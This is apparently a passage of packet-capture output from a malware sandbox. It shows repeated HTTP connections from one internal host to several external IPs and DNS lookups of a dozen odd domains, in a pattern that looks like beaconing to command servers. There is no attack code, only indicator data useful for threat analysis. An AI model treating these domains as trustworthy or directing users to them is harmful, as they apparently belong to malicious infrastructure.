Sep 25, 2024 11:37:21.201698065 CEST  52106        80         192.168.2.7     3.33.130.190
Sep 25, 2024 11:37:21.206981897 CEST  80           52106      3.33.130.190    192.168.2.7
Sep 25, 2024 11:37:21.207082987 CEST  52106        80         192.168.2.7     3.33.130.190
Sep 25, 2024 11:37:21.218815088 CEST  52106        80         192.168.2.7     3.33.130.190
Sep 25, 2024 11:37:21.223689079 CEST  80           52106      3.33.130.190    192.168.2.7
Sep 25, 2024 11:37:21.223712921 CEST  80           52106      3.33.130.190    192.168.2.7
Sep 25, 2024 11:37:21.688884974 CEST  80           52106      3.33.130.190    192.168.2.7
Sep 25, 2024 11:37:21.688957930 CEST  52106        80         192.168.2.7     3.33.130.190
Sep 25, 2024 11:37:22.730051041 CEST  52106        80         192.168.2.7     3.33.130.190
Sep 25, 2024 11:37:22.739134073 CEST  80           52106      3.33.130.190    192.168.2.7
Sep 25, 2024 11:37:23.748820066 CEST  52107        80         192.168.2.7     3.33.130.190
Sep 25, 2024 11:37:23.753964901 CEST  80           52107      3.33.130.190    192.168.2.7
Sep 25, 2024 11:37:23.754112005 CEST  52107        80         192.168.2.7     3.33.130.190
Sep 25, 2024 11:37:23.761811018 CEST  52107        80         192.168.2.7     3.33.130.190
Sep 25, 2024 11:37:23.766891003 CEST  80           52107      3.33.130.190    192.168.2.7
Sep 25, 2024 11:37:24.230459929 CEST  80           52107      3.33.130.190    192.168.2.7
Sep 25, 2024 11:37:24.230525970 CEST  80           52107      3.33.130.190    192.168.2.7
Sep 25, 2024 11:37:24.230695963 CEST  52107        80         192.168.2.7     3.33.130.190
Sep 25, 2024 11:37:24.233376026 CEST  52107        80         192.168.2.7     3.33.130.190
Sep 25, 2024 11:37:24.238209009 CEST  80           52107      3.33.130.190    192.168.2.7
Sep 25, 2024 11:37:29.642652035 CEST  52108        80         192.168.2.7     172.191.244.62
Sep 25, 2024 11:37:29.647540092 CEST  80           52108      172.191.244.62  192.168.2.7
Sep 25, 2024 11:37:29.647653103 CEST  52108        80         192.168.2.7     172.191.244.62
Sep 25, 2024 11:37:29.659002066 CEST  52108        80         192.168.2.7     172.191.244.62
Sep 25, 2024 11:37:29.668083906 CEST  80           52108      172.191.244.62  192.168.2.7
Sep 25, 2024 11:37:30.189925909 CEST  80           52108      172.191.244.62  192.168.2.7
Sep 25, 2024 11:37:30.189943075 CEST  80           52108      172.191.244.62  192.168.2.7
Sep 25, 2024 11:37:30.189966917 CEST  80           52108      172.191.244.62  192.168.2.7
Sep 25, 2024 11:37:30.189995050 CEST  52108        80         192.168.2.7     172.191.244.62
Sep 25, 2024 11:37:30.190026045 CEST  52108        80         192.168.2.7     172.191.244.62
Sep 25, 2024 11:37:31.167465925 CEST  52108        80         192.168.2.7     172.191.244.62
Sep 25, 2024 11:37:32.186121941 CEST  52109        80         192.168.2.7     172.191.244.62
Sep 25, 2024 11:37:32.191018105 CEST  80           52109      172.191.244.62  192.168.2.7
Sep 25, 2024 11:37:32.191138983 CEST  52109        80         192.168.2.7     172.191.244.62
                                              Sep 25, 2024 11:37:32.202111959 CEST5210980192.168.2.7172.191.244.62
                                              Sep 25, 2024 11:37:32.206958055 CEST8052109172.191.244.62192.168.2.7
                                              Sep 25, 2024 11:37:32.652033091 CEST8052109172.191.244.62192.168.2.7
                                              Sep 25, 2024 11:37:32.652072906 CEST8052109172.191.244.62192.168.2.7
                                              Sep 25, 2024 11:37:32.652322054 CEST5210980192.168.2.7172.191.244.62
                                              Sep 25, 2024 11:37:33.714423895 CEST5210980192.168.2.7172.191.244.62
                                              Sep 25, 2024 11:37:34.733455896 CEST5211080192.168.2.7172.191.244.62
                                              Sep 25, 2024 11:37:34.738698006 CEST8052110172.191.244.62192.168.2.7
                                              Sep 25, 2024 11:37:34.738821030 CEST5211080192.168.2.7172.191.244.62
                                              Sep 25, 2024 11:37:34.750504017 CEST5211080192.168.2.7172.191.244.62
                                              Sep 25, 2024 11:37:34.755361080 CEST8052110172.191.244.62192.168.2.7
                                              Sep 25, 2024 11:37:34.755492926 CEST8052110172.191.244.62192.168.2.7
                                              Sep 25, 2024 11:37:35.206567049 CEST8052110172.191.244.62192.168.2.7
                                              Sep 25, 2024 11:37:35.207003117 CEST8052110172.191.244.62192.168.2.7
                                              Sep 25, 2024 11:37:35.207082987 CEST5211080192.168.2.7172.191.244.62
                                              Sep 25, 2024 11:37:36.261260033 CEST5211080192.168.2.7172.191.244.62
                                              Sep 25, 2024 11:37:37.280400038 CEST5211180192.168.2.7172.191.244.62
                                              Sep 25, 2024 11:37:37.285484076 CEST8052111172.191.244.62192.168.2.7
                                              Sep 25, 2024 11:37:37.285615921 CEST5211180192.168.2.7172.191.244.62
                                              Sep 25, 2024 11:37:37.293060064 CEST5211180192.168.2.7172.191.244.62
                                              Sep 25, 2024 11:37:37.297950029 CEST8052111172.191.244.62192.168.2.7
                                              Sep 25, 2024 11:37:37.743155003 CEST8052111172.191.244.62192.168.2.7
                                              Sep 25, 2024 11:37:37.743778944 CEST8052111172.191.244.62192.168.2.7
                                              Sep 25, 2024 11:37:37.743829966 CEST5211180192.168.2.7172.191.244.62
                                              Sep 25, 2024 11:37:37.747030020 CEST5211180192.168.2.7172.191.244.62
                                              Sep 25, 2024 11:37:37.751888037 CEST8052111172.191.244.62192.168.2.7
                                              Sep 25, 2024 11:37:43.149413109 CEST5211280192.168.2.7172.96.191.39
                                              Sep 25, 2024 11:37:43.154336929 CEST8052112172.96.191.39192.168.2.7
                                              Sep 25, 2024 11:37:43.154406071 CEST5211280192.168.2.7172.96.191.39
                                              Sep 25, 2024 11:37:43.167974949 CEST5211280192.168.2.7172.96.191.39
                                              Sep 25, 2024 11:37:43.172934055 CEST8052112172.96.191.39192.168.2.7
                                              Sep 25, 2024 11:37:44.122807026 CEST8052112172.96.191.39192.168.2.7
                                              Sep 25, 2024 11:37:44.122829914 CEST8052112172.96.191.39192.168.2.7
                                              Sep 25, 2024 11:37:44.122843027 CEST8052112172.96.191.39192.168.2.7
                                              Sep 25, 2024 11:37:44.123012066 CEST5211280192.168.2.7172.96.191.39
                                              Sep 25, 2024 11:37:44.685626984 CEST5211280192.168.2.7172.96.191.39
                                              Sep 25, 2024 11:37:45.705240965 CEST5211380192.168.2.7172.96.191.39
                                              Sep 25, 2024 11:37:45.710139036 CEST8052113172.96.191.39192.168.2.7
                                              Sep 25, 2024 11:37:45.710221052 CEST5211380192.168.2.7172.96.191.39
                                              Sep 25, 2024 11:37:45.725790977 CEST5211380192.168.2.7172.96.191.39
                                              Sep 25, 2024 11:37:45.730771065 CEST8052113172.96.191.39192.168.2.7
                                              Sep 25, 2024 11:37:46.660654068 CEST8052113172.96.191.39192.168.2.7
                                              Sep 25, 2024 11:37:46.660744905 CEST8052113172.96.191.39192.168.2.7
                                              Sep 25, 2024 11:37:46.664263010 CEST5211380192.168.2.7172.96.191.39
                                              Sep 25, 2024 11:37:47.229980946 CEST5211380192.168.2.7172.96.191.39
                                              Sep 25, 2024 11:37:48.249119043 CEST5211480192.168.2.7172.96.191.39
                                              Sep 25, 2024 11:37:48.254101038 CEST8052114172.96.191.39192.168.2.7
                                              Sep 25, 2024 11:37:48.255753994 CEST5211480192.168.2.7172.96.191.39
                                              Sep 25, 2024 11:37:48.267643929 CEST5211480192.168.2.7172.96.191.39
                                              Sep 25, 2024 11:37:48.272552013 CEST8052114172.96.191.39192.168.2.7
                                              Sep 25, 2024 11:37:48.272679090 CEST8052114172.96.191.39192.168.2.7
                                              Sep 25, 2024 11:37:49.179666042 CEST8052114172.96.191.39192.168.2.7
                                              Sep 25, 2024 11:37:49.179785013 CEST8052114172.96.191.39192.168.2.7
                                              Sep 25, 2024 11:37:49.179940939 CEST5211480192.168.2.7172.96.191.39
                                              Sep 25, 2024 11:37:49.777096033 CEST5211480192.168.2.7172.96.191.39
                                              Sep 25, 2024 11:37:50.795949936 CEST5211580192.168.2.7172.96.191.39
                                              Sep 25, 2024 11:37:50.800924063 CEST8052115172.96.191.39192.168.2.7
                                              Sep 25, 2024 11:37:50.804415941 CEST5211580192.168.2.7172.96.191.39
                                              Sep 25, 2024 11:37:50.812529087 CEST5211580192.168.2.7172.96.191.39
                                              Sep 25, 2024 11:37:50.817404032 CEST8052115172.96.191.39192.168.2.7
                                              Sep 25, 2024 11:37:51.714113951 CEST8052115172.96.191.39192.168.2.7
                                              Sep 25, 2024 11:37:51.714771032 CEST8052115172.96.191.39192.168.2.7
                                              Sep 25, 2024 11:37:51.714838028 CEST5211580192.168.2.7172.96.191.39
                                              Sep 25, 2024 11:37:51.717613935 CEST5211580192.168.2.7172.96.191.39
                                              Sep 25, 2024 11:37:51.722572088 CEST8052115172.96.191.39192.168.2.7
                                              Sep 25, 2024 11:37:56.944108963 CEST5211680192.168.2.7217.70.184.50
                                              Sep 25, 2024 11:37:56.949208021 CEST8052116217.70.184.50192.168.2.7
                                              Sep 25, 2024 11:37:56.949734926 CEST5211680192.168.2.7217.70.184.50
                                              Sep 25, 2024 11:37:56.961630106 CEST5211680192.168.2.7217.70.184.50
                                              Sep 25, 2024 11:37:56.966531992 CEST8052116217.70.184.50192.168.2.7
                                              Sep 25, 2024 11:37:57.561903954 CEST8052116217.70.184.50192.168.2.7
                                              Sep 25, 2024 11:37:57.561932087 CEST8052116217.70.184.50192.168.2.7
                                              Sep 25, 2024 11:37:57.561999083 CEST5211680192.168.2.7217.70.184.50
                                              Sep 25, 2024 11:37:58.467725992 CEST5211680192.168.2.7217.70.184.50
                                              Sep 25, 2024 11:37:59.483658075 CEST5211780192.168.2.7217.70.184.50
                                              Sep 25, 2024 11:37:59.489672899 CEST8052117217.70.184.50192.168.2.7
                                              Sep 25, 2024 11:37:59.489758015 CEST5211780192.168.2.7217.70.184.50
                                              Sep 25, 2024 11:37:59.505280018 CEST5211780192.168.2.7217.70.184.50
                                              Sep 25, 2024 11:37:59.510333061 CEST8052117217.70.184.50192.168.2.7
                                              Sep 25, 2024 11:38:00.093703985 CEST8052117217.70.184.50192.168.2.7
                                              Sep 25, 2024 11:38:00.093807936 CEST8052117217.70.184.50192.168.2.7
                                              Sep 25, 2024 11:38:00.099886894 CEST5211780192.168.2.7217.70.184.50
                                              Sep 25, 2024 11:38:01.011303902 CEST5211780192.168.2.7217.70.184.50
                                              Sep 25, 2024 11:38:02.033663988 CEST5211880192.168.2.7217.70.184.50
                                              Sep 25, 2024 11:38:02.038621902 CEST8052118217.70.184.50192.168.2.7
                                              Sep 25, 2024 11:38:02.045660973 CEST5211880192.168.2.7217.70.184.50
                                              Sep 25, 2024 11:38:02.053656101 CEST5211880192.168.2.7217.70.184.50
                                              Sep 25, 2024 11:38:02.058629990 CEST8052118217.70.184.50192.168.2.7
                                              Sep 25, 2024 11:38:02.058645964 CEST8052118217.70.184.50192.168.2.7
                                              Sep 25, 2024 11:38:02.650785923 CEST8052118217.70.184.50192.168.2.7
                                              Sep 25, 2024 11:38:02.650902033 CEST8052118217.70.184.50192.168.2.7
                                              Sep 25, 2024 11:38:02.652252913 CEST5211880192.168.2.7217.70.184.50
                                              Sep 25, 2024 11:38:03.558187008 CEST5211880192.168.2.7217.70.184.50
                                              Sep 25, 2024 11:38:04.581651926 CEST5211980192.168.2.7217.70.184.50
                                              Sep 25, 2024 11:38:04.586580038 CEST8052119217.70.184.50192.168.2.7
                                              Sep 25, 2024 11:38:04.586777925 CEST5211980192.168.2.7217.70.184.50
                                              Sep 25, 2024 11:38:04.594868898 CEST5211980192.168.2.7217.70.184.50
                                              Sep 25, 2024 11:38:04.599847078 CEST8052119217.70.184.50192.168.2.7
                                              Sep 25, 2024 11:38:05.211067915 CEST8052119217.70.184.50192.168.2.7
                                              Sep 25, 2024 11:38:05.211108923 CEST8052119217.70.184.50192.168.2.7
                                              Sep 25, 2024 11:38:05.211127043 CEST8052119217.70.184.50192.168.2.7
                                              Sep 25, 2024 11:38:05.211275101 CEST5211980192.168.2.7217.70.184.50
                                              Sep 25, 2024 11:38:05.292314053 CEST5211980192.168.2.7217.70.184.50
                                              Sep 25, 2024 11:38:05.297801971 CEST8052119217.70.184.50192.168.2.7
                                              Sep 25, 2024 11:38:10.981661081 CEST5212080192.168.2.763.250.47.40
                                              Sep 25, 2024 11:38:10.986608982 CEST805212063.250.47.40192.168.2.7
                                              Sep 25, 2024 11:38:10.986701965 CEST5212080192.168.2.763.250.47.40
                                              Sep 25, 2024 11:38:10.999030113 CEST5212080192.168.2.763.250.47.40
                                              Sep 25, 2024 11:38:11.003901005 CEST805212063.250.47.40192.168.2.7
                                              Sep 25, 2024 11:38:11.585447073 CEST805212063.250.47.40192.168.2.7
                                              Sep 25, 2024 11:38:11.586035013 CEST805212063.250.47.40192.168.2.7
                                              Sep 25, 2024 11:38:11.586095095 CEST5212080192.168.2.763.250.47.40
                                              Sep 25, 2024 11:38:12.511399984 CEST5212080192.168.2.763.250.47.40
                                              Sep 25, 2024 11:38:13.532090902 CEST5212180192.168.2.763.250.47.40
                                              Sep 25, 2024 11:38:13.537321091 CEST805212163.250.47.40192.168.2.7
                                              Sep 25, 2024 11:38:13.537406921 CEST5212180192.168.2.763.250.47.40
                                              Sep 25, 2024 11:38:13.554080963 CEST5212180192.168.2.763.250.47.40
                                              Sep 25, 2024 11:38:13.559071064 CEST805212163.250.47.40192.168.2.7
                                              Sep 25, 2024 11:38:14.144331932 CEST805212163.250.47.40192.168.2.7
                                              Sep 25, 2024 11:38:14.144393921 CEST805212163.250.47.40192.168.2.7
                                              Sep 25, 2024 11:38:14.149666071 CEST5212180192.168.2.763.250.47.40
                                              Sep 25, 2024 11:38:15.058401108 CEST5212180192.168.2.763.250.47.40
                                              Sep 25, 2024 11:38:16.085660934 CEST5212280192.168.2.763.250.47.40
                                              Sep 25, 2024 11:38:16.090642929 CEST805212263.250.47.40192.168.2.7
                                              Sep 25, 2024 11:38:16.093825102 CEST5212280192.168.2.763.250.47.40
                                              Sep 25, 2024 11:38:16.105684996 CEST5212280192.168.2.763.250.47.40
                                              Sep 25, 2024 11:38:16.110575914 CEST805212263.250.47.40192.168.2.7
                                              Sep 25, 2024 11:38:16.110712051 CEST805212263.250.47.40192.168.2.7
                                              Sep 25, 2024 11:38:16.688536882 CEST805212263.250.47.40192.168.2.7
                                              Sep 25, 2024 11:38:16.688575983 CEST805212263.250.47.40192.168.2.7
                                              Sep 25, 2024 11:38:16.688709974 CEST5212280192.168.2.763.250.47.40
                                              Sep 25, 2024 11:38:17.623505116 CEST5212280192.168.2.763.250.47.40
                                              Sep 25, 2024 11:38:18.639810085 CEST5212380192.168.2.763.250.47.40
                                              Sep 25, 2024 11:38:18.645817995 CEST805212363.250.47.40192.168.2.7
                                              Sep 25, 2024 11:38:18.645936012 CEST5212380192.168.2.763.250.47.40
                                              Sep 25, 2024 11:38:18.655910969 CEST5212380192.168.2.763.250.47.40
                                              Sep 25, 2024 11:38:18.660706997 CEST805212363.250.47.40192.168.2.7
                                              Sep 25, 2024 11:38:19.231906891 CEST805212363.250.47.40192.168.2.7
                                              Sep 25, 2024 11:38:19.231985092 CEST805212363.250.47.40192.168.2.7
                                              Sep 25, 2024 11:38:19.232099056 CEST5212380192.168.2.763.250.47.40
                                              Sep 25, 2024 11:38:19.236215115 CEST5212380192.168.2.763.250.47.40
                                              Sep 25, 2024 11:38:19.241230011 CEST805212363.250.47.40192.168.2.7
                                              Sep 25, 2024 11:38:24.276231050 CEST5212480192.168.2.791.184.0.200
                                              Sep 25, 2024 11:38:24.281135082 CEST805212491.184.0.200192.168.2.7
                                              Sep 25, 2024 11:38:24.282066107 CEST5212480192.168.2.791.184.0.200
                                              Sep 25, 2024 11:38:24.293692112 CEST5212480192.168.2.791.184.0.200
                                              Sep 25, 2024 11:38:24.298641920 CEST805212491.184.0.200192.168.2.7
                                              Sep 25, 2024 11:38:24.903033018 CEST805212491.184.0.200192.168.2.7
                                              Sep 25, 2024 11:38:24.903080940 CEST805212491.184.0.200192.168.2.7
                                              Sep 25, 2024 11:38:24.904088020 CEST5212480192.168.2.791.184.0.200
                                              Sep 25, 2024 11:38:25.809516907 CEST5212480192.168.2.791.184.0.200
                                              Sep 25, 2024 11:38:26.828399897 CEST5212580192.168.2.791.184.0.200
                                              Sep 25, 2024 11:38:26.833833933 CEST805212591.184.0.200192.168.2.7
                                              Sep 25, 2024 11:38:26.835923910 CEST5212580192.168.2.791.184.0.200
                                              Sep 25, 2024 11:38:26.847807884 CEST5212580192.168.2.791.184.0.200
                                              Sep 25, 2024 11:38:26.852689981 CEST805212591.184.0.200192.168.2.7
                                              Sep 25, 2024 11:38:27.458257914 CEST805212591.184.0.200192.168.2.7
                                              Sep 25, 2024 11:38:27.458381891 CEST805212591.184.0.200192.168.2.7
                                              Sep 25, 2024 11:38:27.458436012 CEST5212580192.168.2.791.184.0.200
                                              Sep 25, 2024 11:38:28.355159044 CEST5212580192.168.2.791.184.0.200
                                              Sep 25, 2024 11:38:29.374927044 CEST5212680192.168.2.791.184.0.200
                                              Sep 25, 2024 11:38:29.380290985 CEST805212691.184.0.200192.168.2.7
                                              Sep 25, 2024 11:38:29.380369902 CEST5212680192.168.2.791.184.0.200
                                              Sep 25, 2024 11:38:29.395831108 CEST5212680192.168.2.791.184.0.200
                                              Sep 25, 2024 11:38:29.400799036 CEST805212691.184.0.200192.168.2.7
                                              Sep 25, 2024 11:38:29.400959969 CEST805212691.184.0.200192.168.2.7
                                              Sep 25, 2024 11:38:30.000355005 CEST805212691.184.0.200192.168.2.7
                                              Sep 25, 2024 11:38:30.000510931 CEST805212691.184.0.200192.168.2.7
                                              Sep 25, 2024 11:38:30.000560999 CEST5212680192.168.2.791.184.0.200
                                              Sep 25, 2024 11:38:30.905685902 CEST5212680192.168.2.791.184.0.200
                                              Sep 25, 2024 11:38:31.921931028 CEST5212780192.168.2.791.184.0.200
                                              Sep 25, 2024 11:38:31.929222107 CEST805212791.184.0.200192.168.2.7
                                              Sep 25, 2024 11:38:31.929352999 CEST5212780192.168.2.791.184.0.200
                                              Sep 25, 2024 11:38:31.940078974 CEST5212780192.168.2.791.184.0.200
                                              Sep 25, 2024 11:38:31.944927931 CEST805212791.184.0.200192.168.2.7
                                              Sep 25, 2024 11:38:32.550679922 CEST805212791.184.0.200192.168.2.7
                                              Sep 25, 2024 11:38:32.550842047 CEST805212791.184.0.200192.168.2.7
                                              Sep 25, 2024 11:38:32.552612066 CEST5212780192.168.2.791.184.0.200
                                              Sep 25, 2024 11:38:32.554002047 CEST5212780192.168.2.791.184.0.200
                                              Sep 25, 2024 11:38:32.558835030 CEST805212791.184.0.200192.168.2.7
                                              Sep 25, 2024 11:38:37.894345045 CEST5212880192.168.2.713.248.169.48
                                              Sep 25, 2024 11:38:37.899333000 CEST805212813.248.169.48192.168.2.7
                                              Sep 25, 2024 11:38:37.899411917 CEST5212880192.168.2.713.248.169.48
                                              Sep 25, 2024 11:38:37.915832043 CEST5212880192.168.2.713.248.169.48
                                              Sep 25, 2024 11:38:37.920706987 CEST805212813.248.169.48192.168.2.7
                                              Sep 25, 2024 11:38:38.362642050 CEST805212813.248.169.48192.168.2.7
                                              Sep 25, 2024 11:38:38.365793943 CEST5212880192.168.2.713.248.169.48
                                              Sep 25, 2024 11:38:39.417829037 CEST5212880192.168.2.713.248.169.48
                                              Sep 25, 2024 11:38:39.422771931 CEST805212813.248.169.48192.168.2.7
                                              Sep 25, 2024 11:38:40.468161106 CEST5212980192.168.2.713.248.169.48
                                              Sep 25, 2024 11:38:40.473154068 CEST805212913.248.169.48192.168.2.7
                                              Sep 25, 2024 11:38:40.480734110 CEST5212980192.168.2.713.248.169.48
                                              Sep 25, 2024 11:38:40.515198946 CEST5212980192.168.2.713.248.169.48
                                              Sep 25, 2024 11:38:40.520095110 CEST805212913.248.169.48192.168.2.7
                                              Sep 25, 2024 11:38:40.948240042 CEST805212913.248.169.48192.168.2.7
                                              Sep 25, 2024 11:38:40.949790001 CEST5212980192.168.2.713.248.169.48
                                              Sep 25, 2024 11:38:42.027403116 CEST5212980192.168.2.713.248.169.48
                                              Sep 25, 2024 11:38:42.032382965 CEST805212913.248.169.48192.168.2.7
                                              Sep 25, 2024 11:38:43.047804117 CEST5213080192.168.2.713.248.169.48
                                              Sep 25, 2024 11:38:43.053903103 CEST805213013.248.169.48192.168.2.7
                                              Sep 25, 2024 11:38:43.056293011 CEST5213080192.168.2.713.248.169.48
                                              Sep 25, 2024 11:38:43.068074942 CEST5213080192.168.2.713.248.169.48
                                              Sep 25, 2024 11:38:43.073009014 CEST805213013.248.169.48192.168.2.7
                                              Sep 25, 2024 11:38:43.073112011 CEST805213013.248.169.48192.168.2.7
                                              Sep 25, 2024 11:38:43.527322054 CEST805213013.248.169.48192.168.2.7
                                              Sep 25, 2024 11:38:43.527375937 CEST5213080192.168.2.713.248.169.48
                                              Sep 25, 2024 11:38:44.574050903 CEST5213080192.168.2.713.248.169.48
                                              Sep 25, 2024 11:38:44.579863071 CEST805213013.248.169.48192.168.2.7
                                              Sep 25, 2024 11:38:45.593816996 CEST5213180192.168.2.713.248.169.48
                                              Sep 25, 2024 11:38:45.599642992 CEST805213113.248.169.48192.168.2.7
                                              Sep 25, 2024 11:38:45.599728107 CEST5213180192.168.2.713.248.169.48
                                              Sep 25, 2024 11:38:45.607721090 CEST5213180192.168.2.713.248.169.48
                                              Sep 25, 2024 11:38:45.612852097 CEST805213113.248.169.48192.168.2.7
                                              Sep 25, 2024 11:38:46.060394049 CEST805213113.248.169.48192.168.2.7
                                              Sep 25, 2024 11:38:46.060461044 CEST805213113.248.169.48192.168.2.7
                                              Sep 25, 2024 11:38:46.060671091 CEST5213180192.168.2.713.248.169.48
                                              Sep 25, 2024 11:38:46.063317060 CEST5213180192.168.2.713.248.169.48
                                              Sep 25, 2024 11:38:46.068070889 CEST805213113.248.169.48192.168.2.7
                                              Sep 25, 2024 11:39:05.229491949 CEST5213680192.168.2.743.242.202.169
                                              Sep 25, 2024 11:39:05.234374046 CEST805213643.242.202.169192.168.2.7
                                              Sep 25, 2024 11:39:05.234450102 CEST5213680192.168.2.743.242.202.169
                                              Sep 25, 2024 11:39:05.249061108 CEST5213680192.168.2.743.242.202.169
                                              Sep 25, 2024 11:39:05.253935099 CEST805213643.242.202.169192.168.2.7
                                              Sep 25, 2024 11:39:06.101471901 CEST805213643.242.202.169192.168.2.7
                                              Sep 25, 2024 11:39:06.101711035 CEST805213643.242.202.169192.168.2.7
                                              Sep 25, 2024 11:39:06.101769924 CEST5213680192.168.2.743.242.202.169
                                              Sep 25, 2024 11:39:06.761717081 CEST5213680192.168.2.743.242.202.169
                                              Sep 25, 2024 11:39:07.780617952 CEST5213780192.168.2.743.242.202.169
                                              Sep 25, 2024 11:39:07.785523891 CEST805213743.242.202.169192.168.2.7
                                              Sep 25, 2024 11:39:07.785626888 CEST5213780192.168.2.743.242.202.169
                                              Sep 25, 2024 11:39:07.796490908 CEST5213780192.168.2.743.242.202.169
                                              Sep 25, 2024 11:39:07.801341057 CEST805213743.242.202.169192.168.2.7
                                              Sep 25, 2024 11:39:08.656403065 CEST805213743.242.202.169192.168.2.7
                                              Sep 25, 2024 11:39:08.656503916 CEST805213743.242.202.169192.168.2.7
                                              Sep 25, 2024 11:39:08.656855106 CEST5213780192.168.2.743.242.202.169
                                              Sep 25, 2024 11:39:09.308600903 CEST5213780192.168.2.743.242.202.169
                                              Sep 25, 2024 11:39:10.333365917 CEST5213880192.168.2.743.242.202.169
                                              Sep 25, 2024 11:39:10.339226007 CEST805213843.242.202.169192.168.2.7
                                              Sep 25, 2024 11:39:10.339306116 CEST5213880192.168.2.743.242.202.169
                                              Sep 25, 2024 11:39:10.350511074 CEST5213880192.168.2.743.242.202.169
                                              Sep 25, 2024 11:39:10.357156992 CEST805213843.242.202.169192.168.2.7
                                              Sep 25, 2024 11:39:10.359420061 CEST805213843.242.202.169192.168.2.7
                                              Sep 25, 2024 11:39:11.201750040 CEST805213843.242.202.169192.168.2.7
                                              Sep 25, 2024 11:39:11.202011108 CEST805213843.242.202.169192.168.2.7
                                              Sep 25, 2024 11:39:11.202053070 CEST5213880192.168.2.743.242.202.169
                                              Sep 25, 2024 11:39:11.855307102 CEST5213880192.168.2.743.242.202.169
                                              Sep 25, 2024 11:39:12.876492977 CEST5213980192.168.2.743.242.202.169
                                              Sep 25, 2024 11:39:12.881510019 CEST805213943.242.202.169192.168.2.7
                                              Sep 25, 2024 11:39:12.881643057 CEST5213980192.168.2.743.242.202.169
                                              Sep 25, 2024 11:39:12.892497063 CEST5213980192.168.2.743.242.202.169
                                              Sep 25, 2024 11:39:12.897392988 CEST805213943.242.202.169192.168.2.7
                                              Sep 25, 2024 11:39:13.754086971 CEST805213943.242.202.169192.168.2.7
                                              Sep 25, 2024 11:39:13.754312038 CEST805213943.242.202.169192.168.2.7
                                              Sep 25, 2024 11:39:13.754390955 CEST5213980192.168.2.743.242.202.169
                                              Sep 25, 2024 11:39:14.697156906 CEST5213980192.168.2.743.242.202.169
                                              Sep 25, 2024 11:39:14.701987028 CEST805213943.242.202.169192.168.2.7
Timestamp                             Source Port  Dest Port  Source IP        Dest IP
Sep 25, 2024 11:36:43.726154089 CEST  53654        53         192.168.2.7      1.1.1.1
Sep 25, 2024 11:36:43.736401081 CEST  53           53654      1.1.1.1          192.168.2.7
Sep 25, 2024 11:36:48.749051094 CEST  50967        53         192.168.2.7      1.1.1.1
Sep 25, 2024 11:36:49.358283997 CEST  53           50967      1.1.1.1          192.168.2.7
Sep 25, 2024 11:36:51.225744009 CEST  53           62493      162.159.36.2     192.168.2.7
Sep 25, 2024 11:36:51.880702019 CEST  53           63488      1.1.1.1          192.168.2.7
Sep 25, 2024 11:36:54.374309063 CEST  59693        53         192.168.2.7      1.1.1.1
Sep 25, 2024 11:36:54.834338903 CEST  53           59693      1.1.1.1          192.168.2.7
Sep 25, 2024 11:37:15.436974049 CEST  62441        53         192.168.2.7      1.1.1.1
Sep 25, 2024 11:37:16.113395929 CEST  53           62441      1.1.1.1          192.168.2.7
Sep 25, 2024 11:37:29.248837948 CEST  58909        53         192.168.2.7      1.1.1.1
Sep 25, 2024 11:37:29.640199900 CEST  53           58909      1.1.1.1          192.168.2.7
Sep 25, 2024 11:37:42.765614986 CEST  52524        53         192.168.2.7      1.1.1.1
Sep 25, 2024 11:37:43.146205902 CEST  53           52524      1.1.1.1          192.168.2.7
Sep 25, 2024 11:37:56.733958006 CEST  64680        53         192.168.2.7      1.1.1.1
Sep 25, 2024 11:37:56.940445900 CEST  53           64680      1.1.1.1          192.168.2.7
Sep 25, 2024 11:38:10.313380957 CEST  65105        53         192.168.2.7      1.1.1.1
Sep 25, 2024 11:38:10.975204945 CEST  53           65105      1.1.1.1          192.168.2.7
Sep 25, 2024 11:38:24.253700018 CEST  50410        53         192.168.2.7      1.1.1.1
Sep 25, 2024 11:38:24.270351887 CEST  53           50410      1.1.1.1          192.168.2.7
Sep 25, 2024 11:38:37.636727095 CEST  65016        53         192.168.2.7      1.1.1.1
Sep 25, 2024 11:38:37.666352034 CEST  53           65016      1.1.1.1          192.168.2.7
Sep 25, 2024 11:38:51.077765942 CEST  61348        53         192.168.2.7      1.1.1.1
Sep 25, 2024 11:39:04.503387928 CEST  56322        53         192.168.2.7      1.1.1.1
Sep 25, 2024 11:39:05.226440907 CEST  53           56322      1.1.1.1          192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 25, 2024 11:36:43.726154089 CEST | 192.168.2.7 | 1.1.1.1 | 0xc06e | Standard query (0) | www.woshop.online | A (IP address) | IN (0x0001) | false
Sep 25, 2024 11:36:48.749051094 CEST | 192.168.2.7 | 1.1.1.1 | 0xe44e | Standard query (0) | www.kxshopmr.store | A (IP address) | IN (0x0001) | false
Sep 25, 2024 11:36:54.374309063 CEST | 192.168.2.7 | 1.1.1.1 | 0xcce3 | Standard query (0) | www.elsupertodo.net | A (IP address) | IN (0x0001) | false
Sep 25, 2024 11:37:15.436974049 CEST | 192.168.2.7 | 1.1.1.1 | 0xdc3b | Standard query (0) | www.omexai.info | A (IP address) | IN (0x0001) | false
Sep 25, 2024 11:37:29.248837948 CEST | 192.168.2.7 | 1.1.1.1 | 0xe7b4 | Standard query (0) | www.tekilla.wtf | A (IP address) | IN (0x0001) | false
Sep 25, 2024 11:37:42.765614986 CEST | 192.168.2.7 | 1.1.1.1 | 0xa65c | Standard query (0) | www.bola88site.one | A (IP address) | IN (0x0001) | false
Sep 25, 2024 11:37:56.733958006 CEST | 192.168.2.7 | 1.1.1.1 | 0x8675 | Standard query (0) | www.languagemodel.pro | A (IP address) | IN (0x0001) | false
Sep 25, 2024 11:38:10.313380957 CEST | 192.168.2.7 | 1.1.1.1 | 0x1b03 | Standard query (0) | www.kexweb.top | A (IP address) | IN (0x0001) | false
Sep 25, 2024 11:38:24.253700018 CEST | 192.168.2.7 | 1.1.1.1 | 0x6a61 | Standard query (0) | www.jobworklanka.online | A (IP address) | IN (0x0001) | false
Sep 25, 2024 11:38:37.636727095 CEST | 192.168.2.7 | 1.1.1.1 | 0x6edc | Standard query (0) | www.dyme.tech | A (IP address) | IN (0x0001) | false
Sep 25, 2024 11:38:51.077765942 CEST | 192.168.2.7 | 1.1.1.1 | 0xe66f | Standard query (0) | www.arlon-commerce.com | A (IP address) | IN (0x0001) | false
Sep 25, 2024 11:39:04.503387928 CEST | 192.168.2.7 | 1.1.1.1 | 0x7904 | Standard query (0) | www.mizuquan.top | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
